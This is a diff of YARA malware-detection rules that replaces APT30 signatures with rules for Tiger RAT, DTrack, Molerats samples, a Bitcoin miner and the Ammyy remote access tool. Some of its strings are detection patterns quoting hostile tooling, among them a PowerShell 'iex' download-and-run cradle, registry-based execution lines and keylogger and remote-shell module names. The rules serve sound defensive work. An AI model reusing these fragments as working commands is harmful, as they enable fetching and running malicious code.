-		$s20 = "XPL0RE." ascii
+		$m1 = ".?AVModuleKeyLogger@@" fullword ascii
+		$m2 = ".?AVModulePortForwarder@@" fullword ascii
+		$m3 = ".?AVModuleScreenCapture@@" fullword ascii
+		$m4 = ".?AVModuleShell@@" fullword ascii
+		$s1 = "\\x9891-009942-xnopcopie.dat" fullword wide
+		$s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii
+		$s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii
+		$s4 = "del \"%s\"%s \"%s\" goto " ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( all of ( $m* ) and 1 of ( $s* ) ) or ( 2 of ( $m* ) and 2 of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_APT30_Generic_G : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_WIN_Tiger_RAT_Auto : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "34269de3-4559-58a5-a621-0ad72857dc9e"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L468-L489"
+		description = "Detects the Tiger RAT variant used by Andariel"
+		author = "CISA.gov"
+		id = "4579af62-52be-5f5f-a577-16ec50297c05"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L425-L565"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1612b392d6145bfb0c43f8a48d78c75f"
-		hash = "53f1358cbc298da96ec56e9a08851b4b"
-		hash = "c2acc9fc9b0f050ec2103d3ba9cb11c0"
-		hash = "f18be055fae2490221c926e2ad55ab11"
-		logic_hash = "6926d73839958acd06835c1943edb150a0f60cdc269fac053531a0e0483e0521"
+		logic_hash = "1deef66efb44c0d17f33508a8b6f0d6253f0308f309e81657f78eb0f87121bf5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "%s\\%s\\%s=%s" fullword ascii
-		$s1 = "Copy File %s OK!" fullword ascii
-		$s2 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
-		$s4 = "open=%s" fullword ascii
-		$s5 = "Maybe a Encrypted Flash Disk" fullword ascii
-		$s12 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
+		$sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 }
+		$sequence_1 = { 41b901000000 488bd6 488bcb e8???????? }
+		$sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 }
+		$sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 }
+		$sequence_4 = { 488b01 ff10 488b4e18 488b01 }
+		$sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 }
+		$sequence_6 = { 488b01 eb03 488bc1 0fb600 }
+		$sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 }
+		$sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 }
+		$sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 }
+		$sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b }
+		$sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff }
+		$sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? }
+		$sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 }
+		$sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? }
+		$sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		filesize < 600KB and 7 of them
 }
-rule SIGNATURE_BASE_APT30_Sample_19 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_WIN_Dtrack_Auto : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-03"
-		modified = "2023-01-06"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L491-L517"
+		description = "Detects DTrack variant used by Andariel"
+		author = "CISA.gov"
+		id = "1b40c685-beba-50fa-b484-c1526577cb23"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L567-L707"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cfa438449715b61bffa20130df8af778ef011e15"
-		logic_hash = "9127ae31c5b818a2759f9d33c74c8631079539e7fa8e49e5514b016df2624065"
+		logic_hash = "2bd68ee6e5f35a9b80c07120beba3fe1f3ba9a9137ee15bb04bb2740381a9a44"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
-		$s1 = "%s,Volume:%s,Type:%s,TotalSize:%uMB,FreeSize:%uMB" fullword ascii
-		$s2 = "\\TEMP\\" ascii
-		$s3 = "\\Temporary Internet Files\\" ascii
-		$s5 = "%s TotalSize:%u Bytes" fullword ascii
-		$s6 = "This Disk Maybe a Encrypted Flash Disk!" fullword ascii
-		$s7 = "User:%-32s" fullword ascii
-		$s8 = "\\Desktop\\" ascii
-		$s9 = "%s.%u_%u" fullword ascii
-		$s10 = "Nick:%-32s" fullword ascii
-		$s11 = "E-mail:%-32s" fullword ascii
-		$s13 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
-		$s14 = "Type:%-8s" fullword ascii
+		$sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }
+		$sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 }
+		$sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 }
+		$sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? }
+		$sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? }
+		$sequence_5 = { 51 e8???????? 83c410 8b558c 52 }
+		$sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? }
+		$sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 }
+		$sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 }
+		$sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 }
+		$sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 }
+		$sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 }
+		$sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 }
+		$sequence_13 = { 0bc1 894518 8b5514 8955f8 }
+		$sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and 8 of them
+		filesize < 1700KB and 7 of them
 }
-rule SIGNATURE_BASE_APT30_Generic_E_V2 : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_1 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40897687-fb17-568e-9907-e9588a53bbe0"
-		date = "2015-04-13"
+		id = "b5277255-3ced-5dc5-9490-c5829a0c248b"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L519-L535"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L11-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "eca53a9f6251ddf438508b28d8a483f91b99a3fd"
-		logic_hash = "25a7e5780f56b4f9cfb76494926c446a39a88bef2cda82b31e6de2b85c5edbda"
+		logic_hash = "1b7f00dfb83f5da46663d94f238b55e375743edbdb01701a78922b87c72c518a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
 
 	strings:
-		$s0 = "Nkfvtyvn}duf_Z}{Ys" fullword ascii
-		$s1 = "Nkfvtyvn}*Zrswru1i" fullword ascii
-		$s2 = "Nkfvtyvn}duf_Z}{V" fullword ascii
-		$s3 = "Nkfvtyvn}*ZrswrumT\\b" fullword ascii
+		$s1 = "ezExODA0Y2U0LTkzMGEtNGIwOS1iZjcwLTlmMWE5NWQwZDcwZH0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{c00" wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_20 : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_2 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91246101-246b-5da9-9e55-7f361d1f6437"
-		date = "2015-04-13"
+		id = "7ef02003-83d1-5ec7-952d-1e693375dd4b"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L537-L557"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L27-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b1c37632e604a5d1f430c9351f87eb9e8ea911c0"
-		logic_hash = "f94cbd4b8e7ba302db9ac4ef3617bd68aa0aa1ee3cfc6dfee4621223bbdae3c5"
+		logic_hash = "35a517039474dcc5d503a48ca17e544166ee2ed44417ea5e7711093d3956f80c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7e122a882d625f4ccac019efb7bf1b1024b9e0919d205105e7e299fb1a20a326"
 
 	strings:
-		$s0 = "dizhi.gif" fullword ascii
-		$s2 = "Mozilla/u" ascii
-		$s3 = "XicrosoftHaveAck" ascii
-		$s4 = "flyeagles" ascii
-		$s10 = "iexplore." ascii
-		$s13 = "WindowsGV" fullword ascii
-		$s16 = "CatePipe" fullword ascii
-		$s17 = "'QWERTY:/webpage3" fullword ascii
+		$s1 = "Folder.exe" fullword ascii
+		$s2 = "Notepad++.exe" fullword wide
+		$s3 = "RSJLRSJOMSJ" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_21 : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_3 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "72005b40-91f7-5661-9478-8680f999b245"
-		date = "2015-04-13"
+		id = "e1a3323e-fe84-59e5-86d9-dca0c261e3c3"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L559-L575"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L44-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d315daa61126616a79a8582145777d8a1565c615"
-		logic_hash = "e3e431bb6915d99b8aa1915419b60ba47372005b9b4994a924746a91bad80310"
+		logic_hash = "4829905ede523fd9ed2cdf610f8fce4c0a5d993885e1897d1782ca70e96fa9a2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "995eee4122802c2dc83bb619f8c53173a5a9c656ad8f43178223d78802445131"
+		hash2 = "fec657a19356753008b0f477083993aa5c36ebaf7276742cf84bfe614678746b"
 
 	strings:
-		$s0 = "Service.dll" fullword ascii
-		$s1 = "(%s:%s %s)" fullword ascii
-		$s2 = "%s \"%s\",%s %s" fullword ascii
-		$s5 = "Proxy-%s:%u" fullword ascii
+		$s1 = "ccleaner.exe" fullword wide
+		$s2 = "Folder.exe" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_22 : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_4 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c1b3dd2-4383-51a2-9185-2365a4d1e784"
-		date = "2015-04-13"
+		id = "cad0c6a2-d286-52fa-b9b8-793ab9ae048f"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L577-L595"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L61-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0d17a58c24753e5f8fd5276f62c8c7394d8e1481"
-		logic_hash = "88a45d248eba7b9776e2e7d345d2948e00a94a7e359acb89d1943be55ab342ad"
+		logic_hash = "dec058ae52a860f4850d7b8024b96c5a9044fdcebadbc12b384f5a6dfae91634"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c"
 
 	strings:
-		$s1 = "(\\TEMP" fullword ascii
-		$s2 = "Windows\\Cur" fullword ascii
-		$s3 = "LSSAS.exeJ" fullword ascii
-		$s4 = "QC:\\WINDOWS" fullword ascii
-		$s5 = "System Volume" fullword ascii
-		$s8 = "PROGRAM FILE" fullword ascii
+		$x1 = "get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'KeyName')" wide
+		$x2 = "O.Run C & chrw(34) & \"[System.IO.File]::" wide
+		$x3 = "HKCU\\SOFTWARE\\Microsoft\\\\KeyName\"" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( filesize < 700KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_F : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_5 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cff8b921-9afc-5a52-84cb-825de33fc86e"
-		date = "2015-04-13"
+		id = "c9dd4f4a-a980-5339-b238-9f53360b89ae"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L597-L615"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L78-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4997b52e0cc12a1a0c84cec3565dd9e6b486ccef4eb8791c566c7a534d36e3ff"
+		logic_hash = "eb2bb54fc1749d8422cdc8e084e1fa66981611128f56e7d7d678f177d37b7cdd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "09010917cd00dc8ddd21aeb066877aa2"
-		hash2 = "4c10a1efed25b828e4785d9526507fbc"
-		hash3 = "b7b282c9e3eca888cbdb5a856e07e8bd"
-		hash4 = "df1799845b51300b03072c6569ab96d5"
+		hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
 
 	strings:
-		$s0 = "\\~zlzl.exe" ascii
-		$s2 = "\\Internet Exp1orer" ascii
-		$s3 = "NodAndKabIsExcellent" fullword ascii
+		$x1 = "powershell.exe -nop -c \"iex" nocase ascii
+		$x2 = ".run('%windir%\\\\SysWOW64\\\\WindowsPowerShell\\\\" ascii
+		$a1 = "Net.WebClient).DownloadString" nocase ascii
+		$a2 = "gist.githubusercontent.com" nocase ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_23 : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_Dropper : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9366dd34-9967-5b40-935e-4b0d8f2f5e9e"
-		date = "2015-04-13"
+		description = "Detects Molerats sample dropper SFX - July 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b4622373-b496-51de-abaa-caa665b558b3"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L617-L637"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L97-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9865e24aadb4480bd3c182e50e0e53316546fc01"
-		logic_hash = "64ff048b061431e0834ac40bfccb0d9e8ca60ffb022578ef910e6ffc511be6ed"
+		logic_hash = "b356d8dbca8f4d11dda976e7eb03c993d05af35d13113b8c85fb07531a0203dc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ad0b3ac8c573d84c0862bf1c912dba951ec280d31fe5b84745ccd12164b0bcdb"
 
 	strings:
-		$s0 = "hostid" ascii
-		$s1 = "\\Window" ascii
-		$s2 = "%u:%u%s" fullword ascii
-		$s5 = "S2tware\\Mic" ascii
-		$s6 = "la/4.0 (compa" ascii
-		$s7 = "NameACKernel" fullword ascii
-		$s12 = "ToWideChc[lo" fullword ascii
-		$s14 = "help32SnapshotfL" ascii
+		$s1 = "Please remove %s from %s folder. It is unsecure to run %s until it is done." fullword wide
+		$s2 = "sfxrar.exe" fullword ascii
+		$s3 = "attachment.hta" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_24 : FILE
+rule SIGNATURE_BASE_BTC_Miner_Lsass1_Chrome_2 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects a Bitcoin Miner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aed2201d-b557-56ec-aa53-fff5b1e17dbd"
-		date = "2015-04-13"
+		id = "7960d96a-7bd3-5135-867d-e39a02274c45"
+		date = "2017-06-22"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L639-L658"
+		reference = "Internal Research - CN Actor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_group_btc.yar#L10-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "572caa09f2b600daa941c60db1fc410bef8d1771"
-		logic_hash = "9d550fd0225f1c4e3b16ae53648644d7bb5c80e99e2a1a3d199e51c7219c2e94"
-		score = 75
+		logic_hash = "ef80dba71c901d6e821b2e08a701a82f8147e41a8f14c5fd324d5e043b0ff322"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "048e9146387d6ff2ac055eb9ddfbfb9a7f70e95c7db9692e2214fa4bec3d5b2e"
+		hash2 = "c8db8469287d47ffdc74fe86ce0e9d6e51de67ba1df318573c9398742116a6e8"
 
 	strings:
-		$s1 = "dizhi.gif" fullword ascii
-		$s3 = "Mozilla/4.0" fullword ascii
-		$s4 = "lyeagles" fullword ascii
-		$s6 = "HHOSTR" ascii
-		$s7 = "#MicrosoftHaveAck7" ascii
-		$s8 = "iexplore." fullword ascii
-		$s17 = "ModuleH" fullword ascii
+		$x1 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
+		$x2 = "-O, --userpass=U:P    username:password pair for mining server" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 6000KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_25 : FILE
+rule SIGNATURE_BASE_CN_Actor_RA_Tool_Ammyy_Mscorsvw : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Ammyy remote access tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b2f2ba2-e9cc-5b3c-8af9-4217d662bc3f"
-		date = "2015-04-13"
+		id = "71a0c5a9-b4dc-508d-a6b7-4b85b75bc34b"
+		date = "2017-06-22"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L660-L679"
+		reference = "Internal Research - CN Actor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_group_btc.yar#L29-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "44a21c8b3147fabc668fee968b62783aa9d90351"
-		logic_hash = "86945188f888762ae585463df7cfb6e5fed30d0fcfcca4e642aedf07a0193ae7"
+		logic_hash = "c4b64b3aa63d80fa1a73b021bf49539af5888f53090555555c1f3fd7fbb90230"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed"
+		hash2 = "d9ec0a1be7cd218042c54bfbc12000662b85349a6b78731a09ed336e5d3cf0b4"
 
 	strings:
-		$s1 = "C:\\WINDOWS" fullword ascii
-		$s2 = "aragua" fullword ascii
-		$s4 = "\\driver32\\7$" ascii
-		$s8 = "System V" fullword ascii
-		$s9 = "Compu~r" fullword ascii
-		$s10 = "PROGRAM L" fullword ascii
-		$s18 = "GPRTMAX" fullword ascii
+		$s1 = "Please enter password for accessing remote computer" fullword ascii
+		$s2 = "Die Zugriffsanforderung wurde vom Remotecomputer abgelehnt" fullword ascii
+		$s3 = "It will automatically be run the next time this computer is restart or you can start it manually" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_26 : FILE
+rule SIGNATURE_BASE_CN_Actor_Ammyyadmin : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects Ammyy Admin Downloader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa80a142-c8fc-504e-b475-e9838607bec6"
-		date = "2015-04-13"
+		id = "08ffb61a-e2de-538e-9d9f-040276324af9"
+		date = "2017-06-22"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L681-L700"
+		reference = "Internal Research - CN Actor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_group_btc.yar#L47-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e26588113417bf68cb0c479638c9cd99a48e846d"
-		logic_hash = "b585687c071dc2dddb888906f47b7af6bc7683e902d3afb42364896e800fac5c"
-		score = 75
+		logic_hash = "b628c7e6debdd2b21a321dc2ec5838fd56107f4cac21bda8b9faa1c1d5b23b71"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed"
 
 	strings:
-		$s1 = "forcegue" fullword ascii
-		$s3 = "Windows\\Cur" fullword ascii
-		$s4 = "System Id" fullword ascii
-		$s5 = "Software\\Mic" fullword ascii
-		$s6 = "utiBy0ToWideCh&$a" fullword ascii
-		$s10 = "ModuleH" fullword ascii
-		$s15 = "PeekNamed6G" fullword ascii
+		$x2 = "\\Ammyy\\sources\\main\\Downloader.cpp" ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_D : FILE
+rule SIGNATURE_BASE_Windivert_Driver : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects WinDivert User-Mode packet capturing driver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b8d8a60-a357-5cfd-8ff1-6264144ad7be"
-		date = "2015-04-13"
+		id = "95e89577-bb5a-5391-9130-155746d4783f"
+		date = "2017-10-02"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L702-L725"
+		reference = "https://www.reqrypt.org/windivert.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_pua.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff39fc7643441652ec0cdf2f84c7827d326ddb5f01451b3857cfc4015eb01467"
-		score = 75
+		logic_hash = "db2933396e015e906114bd04f75a5b5caf0564494224f533a6e00c1fa5421568"
+		score = 40
 		quality = 85
 		tags = "FILE"
